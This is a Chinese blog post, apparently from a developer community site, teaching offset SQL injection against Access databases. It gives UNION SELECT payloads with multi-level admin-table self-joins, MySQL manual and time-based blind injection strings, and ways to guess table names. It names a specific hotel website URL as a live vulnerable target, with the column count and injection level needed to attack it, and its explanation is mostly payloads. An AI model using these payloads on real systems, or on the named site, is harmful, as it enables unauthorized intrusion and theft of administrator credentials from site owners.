ACCESS数据库偏移注入

access数据库简介

access 关系型数据库,同时 也是文件型数据库,不需要端口号。
结构上与其他关系型数据库不同,只有表名、列名、字段名, 没有数据库名, 自己网站自己管,数据库*.mdb直接在自己网站目录下面,同时它也没有一些相关函数,如文件读写等,目前用的已经不多了。

注入偏移步骤

判断列数=》22
在这里插入图片描述
在这里插入图片描述
联合查询
在这里插入图片描述
逐个向前迁移判断表中字段数=》22-16=6
在这里插入图片描述

爆破字段内容:

一级偏移注入22-6×2=10

UNION SELECT 1,2,3,4,5,6,7,8,9,10,*from (admin as a inner join admin as b on a.id = b.id)
在这里插入图片描述
二级偏移注入10-6=4

UNION SELECT 1,2,3,4,a.id,b.id,c.id,*from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
在这里插入图片描述
查看源码
在这里插入图片描述
有的可能还需要三级偏移注入

a.id,b.id,c.id,c.id,*from (((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)inner join admin as d on a.id=d.id)

表名猜解思路

表名猜解的话可以通过扫后台登陆url,url中的路径名可能就是表名
还有就是登陆框源码,其中的用户名密码变量名也有可能就是表名
如果还是不行,那只能通过字典爆破了

access数据库注入漏洞实例站点

http://www.ronghuhotel.com/Newsview.asp?id=23

order 16 字段5 需二级偏移注入

mysql与sql server数据库可操作内容对比

每个数据库的操作内容都不相同,同时权限不同,可执行的内容也不同,如下是mysql与mssql数据库操作内容对比:

mysql数据库,root是最高权限
在这里插入图片描述
sql server里面,sysadmin是最高权限
在这里插入图片描述

手工猜解思路

?id=-1 and length(database())=2
?id=2’ and substr(database(),1,1)=’s’–+

盲注

?id=1’ and if(length(database())=1,sleep(5),1)–+

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值